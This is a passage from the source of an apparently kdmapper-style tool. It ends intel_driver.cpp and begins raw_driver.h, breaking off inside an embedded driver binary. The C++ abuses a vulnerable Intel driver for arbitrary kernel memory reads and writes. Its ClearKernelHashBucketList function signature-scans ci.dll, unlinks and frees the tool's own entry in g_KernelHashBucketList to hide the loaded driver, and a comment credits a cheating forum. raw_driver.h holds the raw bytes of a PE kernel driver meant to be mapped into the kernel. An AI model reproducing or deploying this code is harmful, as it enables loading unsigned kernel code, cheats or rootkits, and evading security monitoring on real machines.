| if (!ReadMemory(device_handle, modulePtr, headers, 0x1000)) { 1083 | Log(L"[-] Can't read module headers" << std::endl); 1084 | return 0; 1085 | } 1086 | ULONG sectionSize = 0; 1087 | uintptr_t section = (uintptr_t)utils::FindSection(sectionName, (uintptr_t)headers, §ionSize); 1088 | if (!section || !sectionSize) { 1089 | Log(L"[-] Can't find section" << std::endl); 1090 | return 0; 1091 | } 1092 | if (size) 1093 | *size = sectionSize; 1094 | return section - (uintptr_t)headers + modulePtr; 1095 | } 1096 | 1097 | uintptr_t intel_driver::FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask) { 1098 | ULONG sectionSize = 0; 1099 | uintptr_t section = FindSectionAtKernel(device_handle, sectionName, modulePtr, §ionSize); 1100 | return FindPatternAtKernel(device_handle, section, sectionSize, bMask, szMask); 1101 | } 1102 | 1103 | bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) { 1104 | uint64_t ci = utils::GetKernelModuleAddress("ci.dll"); 1105 | if (!ci) { 1106 | Log(L"[-] Can't Find ci.dll module address" << std::endl); 1107 | return false; 1108 | } 1109 | 1110 | //Thanks @KDIo3 and @Swiftik from UnknownCheats 1111 | #ifdef PDB_OFFSETS 1112 | auto g_KernelHashBucketListOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"g_KernelHashBucketList"); 1113 | if (!g_KernelHashBucketListOffset) 1114 | { 1115 | Log(L"[-] Can't Find g_KernelHashBucketList Offset" << std::endl); 1116 | return false; 1117 | } 1118 | 1119 | auto g_HashCacheLockOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"g_HashCacheLock"); 1120 | if (!g_KernelHashBucketListOffset) 1121 | { 1122 | Log(L"[-] Can't Find g_HashCacheLock Offset" << std::endl); 1123 | return false; 1124 | } 1125 | 1126 | PVOID g_KernelHashBucketList = (PVOID)(ci + g_KernelHashBucketListOffset); 1127 | PVOID g_HashCacheLock = (PVOID)(ci + g_HashCacheLockOffset); 1128 | #else 1129 | auto sig = FindPatternInSectionAtKernel(device_handle, "PAGE", ci, PUCHAR("\x48\x8B\x1D\x00\x00\x00\x00\xEB\x00\xF7\x43\x40\x00\x20\x00\x00"), "xxx????x?xxxxxxx"); 1130 | if (!sig) { 1131 | Log(L"[-] Can't Find g_KernelHashBucketList" << std::endl); 1132 | return false; 1133 | } 1134 | auto sig2 = FindPatternAtKernel(device_handle, (uintptr_t)sig - 50, 50, PUCHAR("\x48\x8D\x0D"), "xxx"); 1135 | if (!sig2) { 1136 | Log(L"[-] Can't Find g_HashCacheLock" << std::endl); 1137 | return false; 1138 | } 1139 | const auto g_KernelHashBucketList = ResolveRelativeAddress(device_handle, (PVOID)sig, 3, 7); 1140 | const auto g_HashCacheLock = ResolveRelativeAddress(device_handle, (PVOID)sig2, 3, 7); 1141 | if (!g_KernelHashBucketList || !g_HashCacheLock) 1142 | { 1143 | Log(L"[-] Can't Find g_HashCache relative address" << std::endl); 1144 | return false; 1145 | } 1146 | #endif 1147 | 1148 | Log(L"[+] g_KernelHashBucketList Found 0x" << std::hex << g_KernelHashBucketList << std::endl); 1149 | 1150 | if (!ExAcquireResourceExclusiveLite(device_handle, g_HashCacheLock, true)) { 1151 | Log(L"[-] Can't lock g_HashCacheLock" << std::endl); 1152 | return false; 1153 | } 1154 | Log(L"[+] g_HashCacheLock Locked" << std::endl); 1155 | 1156 | nt::HashBucketEntry* prev = (nt::HashBucketEntry*)g_KernelHashBucketList; 1157 | nt::HashBucketEntry* entry = 0; 1158 | if (!ReadMemory(device_handle, (uintptr_t)prev, &entry, sizeof(entry))) { 1159 | Log(L"[-] Failed to read first g_KernelHashBucketList entry!" << std::endl); 1160 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1161 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1162 | } 1163 | return false; 1164 | } 1165 | if (!entry) { 1166 | Log(L"[!] g_KernelHashBucketList looks empty!" << std::endl); 1167 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1168 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1169 | } 1170 | return true; 1171 | } 1172 | 1173 | std::wstring wdname = GetDriverNameW(); 1174 | std::wstring search_path = GetDriverPath(); 1175 | SIZE_T expected_len = (search_path.length() - 2) * 2; 1176 | 1177 | while (entry) { 1178 | 1179 | USHORT wsNameLen = 0; 1180 | if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Length), &wsNameLen, sizeof(wsNameLen)) || wsNameLen == 0) { 1181 | Log(L"[-] Failed to read g_KernelHashBucketList entry text len!" << std::endl); 1182 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1183 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1184 | } 1185 | return false; 1186 | } 1187 | 1188 | if (expected_len == wsNameLen) { 1189 | wchar_t* wsNamePtr = 0; 1190 | if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Buffer), &wsNamePtr, sizeof(wsNamePtr)) || !wsNamePtr) { 1191 | Log(L"[-] Failed to read g_KernelHashBucketList entry text ptr!" << std::endl); 1192 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1193 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1194 | } 1195 | return false; 1196 | } 1197 | 1198 | auto wsName = std::make_unique((ULONG64)wsNameLen / 2ULL + 1ULL); 1199 | if (!ReadMemory(device_handle, (uintptr_t)wsNamePtr, wsName.get(), wsNameLen)) { 1200 | Log(L"[-] Failed to read g_KernelHashBucketList entry text!" << std::endl); 1201 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1202 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1203 | } 1204 | return false; 1205 | } 1206 | 1207 | size_t find_result = std::wstring(wsName.get()).find(wdname); 1208 | if (find_result != std::wstring::npos) { 1209 | Log(L"[+] Found In g_KernelHashBucketList: " << std::wstring(&wsName[find_result]) << std::endl); 1210 | nt::HashBucketEntry* Next = 0; 1211 | if (!ReadMemory(device_handle, (uintptr_t)entry, &Next, sizeof(Next))) { 1212 | Log(L"[-] Failed to read g_KernelHashBucketList next entry ptr!" << std::endl); 1213 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1214 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1215 | } 1216 | return false; 1217 | } 1218 | 1219 | if (!WriteMemory(device_handle, (uintptr_t)prev, &Next, sizeof(Next))) { 1220 | Log(L"[-] Failed to write g_KernelHashBucketList prev entry ptr!" << std::endl); 1221 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1222 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1223 | } 1224 | return false; 1225 | } 1226 | 1227 | if (!FreePool(device_handle, (uintptr_t)entry)) { 1228 | Log(L"[-] Failed to clear g_KernelHashBucketList entry pool!" << std::endl); 1229 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1230 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1231 | } 1232 | return false; 1233 | } 1234 | Log(L"[+] g_KernelHashBucketList Cleaned" << std::endl); 1235 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1236 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1237 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1238 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1239 | } 1240 | return false; 1241 | } 1242 | return true; 1243 | } 1244 | } 1245 | prev = entry; 1246 | //read next 1247 | if (!ReadMemory(device_handle, (uintptr_t)entry, &entry, sizeof(entry))) { 1248 | Log(L"[-] Failed to read g_KernelHashBucketList next entry!" << std::endl); 1249 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1250 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1251 | } 1252 | return false; 1253 | } 1254 | } 1255 | 1256 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1257 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1258 | } 1259 | return false; 1260 | } 1261 | -------------------------------------------------------------------------------- /raw_driver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // RickOwens00 4 | inline unsigned char rawData[11000] = { 5 | 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 6 | 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 8 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0xD0, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 11 | 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 12 | 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, 13 | 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 14 | 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 15 | 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2D, 0xC4, 0x5D, 0x16, 16 | 0x69, 0xA5, 0x33, 0x45, 0x69, 0xA5, 0x33, 0x45, 0x69, 0xA5, 0x33, 0x45, 17 | 0x1D, 0x24, 0x30, 0x44, 0x6D, 0xA5, 0x33, 0x45, 0x1D, 0x24, 0x37, 0x44, 18 | 0x6C, 0xA5, 0x33, 0x45, 0x1D, 0x24, 0x32, 0x44, 0x6A, 0xA5, 0x33, 0x45, 19 | 0x69, 0xA5, 0x32, 0x45, 0x66, 0xA5, 0x33, 0x45, 0x93, 0x22, 0x36, 0x44, 20 | 0x68, 0xA5, 0x33, 0x45, 0x93, 0x22, 0x31, 0x44, 0x68, 0xA5, 0x33, 0x45, 21 | 0x52, 0x69, 0x63, 0x68, 0x69, 0xA5, 0x33, 0x45, 0x00, 0x00, 0x00, 0x00, 22 | 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x06, 0x00, 23 | 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 24 | 0xF0, 0x00, 0x22, 0x00, 0x0B, 0x02, 0x0E, 0x2B, 0x00, 0x14, 0x00, 0x00, 25 | 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 26 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 27 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 28 | 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 29 | 0x00, 0x70, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4B, 0x4F, 0x00, 0x00, 30 | 0x01, 0x00, 0x60, 0x41, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 31 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 32 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 33 | 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 34 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 35 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 36 | 0xE4, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0xF8, 0x06, 0x00, 0x00, 37 | 0x00, 0x60, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x10, 0x22, 0x00, 0x00, 38 | 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 39 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 40 | 0x00, 0x00, 0x00, 0x00, 0xD0, 0x20, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00, 41 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 42 | 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 43 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 44 | 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 45 | 0x38, 0x0E, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 46 | 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 47 | 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, 48 | 0x74, 0x61, 0x00, 0x00, 0x18, 0x05, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 49 | 0x00, 0x06, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 51 | 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 52 | 0x00, 0x30, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x1A, 0x00, 0x00, 53 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 54 | 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 55 | 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 56 | 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 57 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x49, 0x4E, 0x49, 0x54, 58 | 0x00, 0x00, 0x00, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 59 | 0x00, 0x04, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 60 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x62, 61 | 0x2E, 0x72, 0x65, 0x6C, 0x6F, 0x63, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 62 | 0x00, 0x60, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x22, 0x00, 0x00, 63 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 64 | 0x40, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 65 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 66 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 70 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 72 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 73 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 74 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 75 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 76 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 77 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 78 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 79 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 80 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 81 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 82 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 83 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 84 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 85 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 86 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 87 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 88 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 89 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 90 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xEC, 0x38, 0x0F, 0x57, 0xC0, 0x48, 91 | 0x8D, 0x15, 0x02, 0x0E, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0x0F, 92 | 0x11, 0x44, 0x24, 0x20, 0xFF, 0x15, 0xE2, 0x0F, 0x00, 0x00, 0x48, 0x8D, 93 | 0x15, 0x3B, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 94 | 0x28, 0x10, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC, 0xCC, 0xCC, 95 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83, 96 | 0xEC, 0x20, 0x48, 0x8B, 0xDA, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 97 | 0xCC, 0x0F, 0x00, 0x00, 0x8B, 0x43, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5B, 98 | 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x55, 0x48, 0x8B, 99 | 0xEC, 0x48, 0x83, 0xEC, 0x60, 0x48, 0x8B, 0xD9, 0x48, 0x8D, 0x15, 0x39, 100 | 0x0D, 0x00, 0x00, 0x0F, 0x57, 0xC0, 0x48, 0x8D, 0x4D, 0xE0, 0x0F, 0x11, 101 | 0x45, 0xE0, 0xFF, 0x15, 0x78, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x45, 0x20, 102 | 0x48, 0xC7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 103 | 0x30, 0x4C, 0x8D, 0x45, 0xE0, 0xC6, 0x44, 0x24, 0x28, 0x00, 0x41, 0xB9, 104 | 0x22, 0x00, 0x00, 0x00, 0x33, 0xD2, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x01, 105 | 0x00, 0x00, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x6D, 0x0F, 0x00, 0x00, 0x85, 106 | 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x6D, 0x0F, 0x57, 0xC0, 0x48, 107 | 0x8D, 0x15, 0x12, 0x0D, 0x00, 0x00, 0x48, 0x8D, 0x4D, 0xF0, 0x0F, 0x11, 108 | 0x45, 0xF0, 0xFF, 0x15, 0x24, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x55, 0xE0, 109 | 0x48, 0x8D, 0x4D, 0xF0, 0xFF, 0x15, 0x46, 0x0F, 0x00, 0x00, 0x85, 0xC0, 110 | 0x78, 0xD1, 0x48, 0x8B, 0x45, 0x20, 0x83, 0x48, 0x30, 0x04, 0x48, 0x8D, 111 | 0x05, 0x43, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x43, 0x70, 0x48, 0x89, 0x83, 112 | 0x80, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x05, 0xD1, 0x02, 0x00, 0x00, 0x48, 113 | 0x89, 0x83, 0xE0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x20, 0x48, 0xC7, 114 | 0x43, 0x68, 0x00, 0x00, 0x00, 0x00, 0x83, 0x60, 0x30, 0xEF, 0x48, 0x8B, 115 | 0x45, 0x20, 0x0F, 0xBA, 0x70, 0x30, 0x07, 0x33, 0xC0, 0x48, 0x8B, 0x5C, 116 | 0x24, 0x70, 0x48, 0x83, 0xC4, 0x60, 0x5D, 0xC3, 0x48, 0x83, 0xEC, 0x28, 117 | 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 0x48, 0x39, 118 | 0x01, 0x74, 0x07, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0xEB, 0x29, 0x45, 0x33, 119 | 0xC0, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x4C, 120 | 0x24, 0x30, 0x48, 0x8D, 0x54, 0x24, 0x30, 0x41, 0x8D, 0x48, 0x42, 0xE8, 121 | 0x46, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 122 | 0x02, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0x40, 0x53, 0x48, 0x83, 123 | 0xEC, 0x20, 0x48, 0x8B, 0x41, 0x28, 0x48, 0x8B, 0xD9, 0x48, 0x85, 0xC0, 124 | 0x75, 0x0D, 0xE8, 0x11, 0x00, 0x00, 0x00, 0x48, 0x0F, 0xBF, 0xC0, 0x48, 125 | 0x8B, 0x04, 0x18, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 126 | 0x48, 0x81, 0xEC, 0x48, 0x01, 0x00, 0x00, 0x33, 0xD2, 0x48, 0x8D, 0x4C, 127 | 0x24, 0x20, 0x41, 0xB8, 0x14, 0x01, 0x00, 0x00, 0xE8, 0xFB, 0x09, 0x00, 128 | 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 0x38, 0x0E, 0x00, 0x00, 129 | 0x8B, 0x44, 0x24, 0x2C, 0x2D, 0xEE, 0x42, 0x00, 0x00, 0x74, 0x2B, 0x2D, 130 | 0x75, 0x02, 0x00, 0x00, 0x74, 0x24, 0x2D, 0x57, 0x02, 0x00, 0x00, 0x74, 131 | 0x16, 0x83, 0xE8, 0x01, 0x74, 0x11, 0x2D, 0xA6, 0x02, 0x00, 0x00, 0x74, 132 | 0x03, 0x83, 0xE8, 0x04, 0xB8, 0x88, 0x03, 0x00, 0x00, 0xEB, 0x0C, 0xB8, 133 | 0x80, 0x02, 0x00, 0x00, 0xEB, 0x05, 0xB8, 0x78, 0x02, 0x00, 0x00, 0x48, 134 | 0x81, 0xC4, 0x48, 0x01, 0x00, 0x00, 0xC3, 0xCC, 0x40, 0x53, 0x48, 0x83, 135 | 0xEC, 0x20, 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 136 | 0x48, 0x8B, 0xD9, 0x48, 0x39, 0x01, 0x75, 0x4D, 0x48, 0x63, 0x41, 0x08, 137 | 0x85, 0xC0, 0x74, 0x45, 0x48, 0x8B, 0xC8, 0x48, 0xC7, 0x44, 0x24, 0x30, 138 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x30, 0xFF, 0x15, 0x05, 139 | 0x0E, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x2A, 140 | 0x48, 0x8B, 0x4C, 0x24, 0x30, 0xE8, 0x56, 0x05, 0x00, 0x00, 0x48, 0x85, 141 | 0xC0, 0x74, 0x16, 0x48, 0x8B, 0x4B, 0x10, 0x48, 0x89, 0x01, 0x48, 0x8B, 142 | 0x4C, 0x24, 0x30, 0xFF, 0x15, 0xCB, 0x0D, 0x00, 0x00, 0x33, 0xC0, 0xEB, 143 | 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 144 | 0x48, 0x83, 0xEC, 0x28, 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 145 | 0x00, 0x00, 0x48, 0x39, 0x01, 0x75, 0x54, 0x48, 0x63, 0x41, 0x08, 0x85, 146 | 0xC0, 0x74, 0x4C, 0x48, 0x8B, 0xC8, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 147 | 0x00, 0x00, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x30, 0xFF, 0x15, 0x9A, 0x0D, 148 | 0x00, 0x00, 0x85, 0xC0, 0x79, 0x05, 0x0F, 0xAE, 0xE8, 0xEB, 0x31, 0x48, 149 | 0x8B, 0x54, 0x24, 0x30, 0x48, 0x8B, 0x8A, 0x50, 0x04, 0x00, 0x00, 0x48, 150 | 0x8B, 0x82, 0x48, 0x04, 0x00, 0x00, 0x48, 0x89, 0x01, 0x48, 0x8B, 0x82, 151 | 0x50, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x8A, 0x48, 0x04, 0x00, 0x00, 0x48, 152 | 0x89, 0x41, 0x08, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 153 | 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0xCC, 0x4C, 0x8B, 0xDC, 0x49, 154 | 0x89, 0x5B, 0x10, 0x49, 0x89, 0x73, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x30, 155 | 0x48, 0xB8, 0xC3, 0x4B, 0x9E, 0x4C, 0x09, 0x00, 0x00, 0x00, 0x48, 0x8B, 156 | 0xF9, 0x48, 0x39, 0x01, 0x0F, 0x85, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x41, 157 | 0x08, 0x85, 0xC0, 0x0F, 0x84, 0x9A, 0x00, 0x00, 0x00, 0x8B, 0xC8, 0x49, 158 | 0xC7, 0x43, 0x08, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8D, 0x53, 0x08, 0xFF, 159 | 0x15, 0x13, 0x0D, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x40, 0x48, 0x85, 160 | 0xC9, 0x74, 0x7C, 0xE8, 0x38, 0xFE, 0xFF, 0xFF, 0x48, 0x8B, 0x4C, 0x24, 161 | 0x40, 0x48, 0x8B, 0xD8, 0xFF, 0x15, 0xE6, 0x0C, 0x00, 0x00, 0x48, 0x8B, 162 | 0x57, 0x10, 0x48, 0x8B, 0xCB, 0x48, 0x8B, 0x77, 0x20, 0xE8, 0x3E, 0x02, 163 | 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x54, 0x4C, 0x8B, 0x57, 0x18, 0x48, 164 | 0x8B, 0xC8, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0xBA, 0x00, 0x10, 0x00, 165 | 0x00, 0x48, 0x2B, 0xD1, 0x48, 0x8D, 0x4F, 0x28, 0x48, 0x3B, 0xD6, 0x48, 166 | 